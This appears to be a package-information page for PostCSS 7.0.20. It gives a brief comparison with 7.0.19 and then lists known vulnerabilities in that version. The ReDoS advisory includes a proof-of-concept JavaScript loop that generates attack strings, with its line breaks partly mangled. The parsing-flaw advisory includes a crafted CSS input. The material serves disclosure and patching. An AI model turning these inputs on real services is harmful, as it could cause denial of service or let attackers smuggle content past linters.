PostCSS version 7.0.20 is a minor patch release succeeding version 7.0.19 in the 7.x series of this powerful CSS transformation tool built with JavaScript plugins. While seemingly incremental, such updates are important for developers relying on PostCSS for their styling workflows. Examining the metadata, both versions share the same core dependencies: chalk for command-line styling, source-map for debugging, and supports-color for terminal color support detection. The license, repository, and author information remain consistent, indicating no fundamental shifts in project governance or origin.
The key difference lies in the subtle changes introduced, potentially bug fixes or efficiency improvements. One indicator is the slightly larger unpackedSize of version 7.0.20 (1086573 bytes) compared to 7.0.19 (1085982 bytes), suggesting code additions or modifications. Furthermore, version 7.0.20 was released a few hours later than 7.0.19. For developers, this suggests the existence of some differences between the releases with the need to check the changelog in order to assess if these changes affect production. The impact from an end-user perspective that utilizes this library is potentially minor, focusing on improved stability or edge-case handling. Developers should consult the official PostCSS changelog and release notes on GitHub to understand precisely what changes were implemented and how they might affect their PostCSS configurations and styling processes before upgrading. These subtle changes contribute to the overall stability and reliability of the tool.
All the vulnerabilities related to the version 7.0.20 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.